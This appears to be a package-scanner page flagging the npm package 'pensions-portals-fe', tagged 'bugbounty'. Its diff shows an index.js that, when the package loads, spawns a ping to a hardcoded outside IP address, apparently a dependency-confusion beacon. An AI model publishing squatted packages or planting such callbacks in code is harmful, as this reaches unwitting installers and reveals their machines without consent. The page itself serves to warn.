pensions-portals-fe 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of pensions-portals-fe might be problematic. Click here for more details.

package/index.js ADDED
@@ -0,0 +1,18 @@
1
+ const { spawn } = require('child_process');
2
+
3
+ const server = '159.203.110.248';
4
+
5
+ const ping = spawn('ping', ['-c', '6', server]);
6
+
7
+ ping.stdout.on('data', (data) => {
8
+ console.log(`stdout: ${data}`);
9
+ });
10
+
11
+ ping.stderr.on('data', (data) => {
12
+ console.error(`stderr: ${data}`);
13
+ });
14
+
15
+ ping.on('close', (code) => {
16
+ console.log(`child process exited with code ${code}`);
17
+ });
18
+
package/package.json ADDED
@@ -0,0 +1,14 @@
1
+ {
2
+ "name": "pensions-portals-fe",
3
+ "version": "1.0.0",
4
+ "description": "testing purposes",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"hello world\""
8
+ },
9
+ "keywords": [
10
+ "bugbounty"
11
+ ],
12
+ "author": "samux",
13
+ "license": "ISC"
14
+ }
Binary file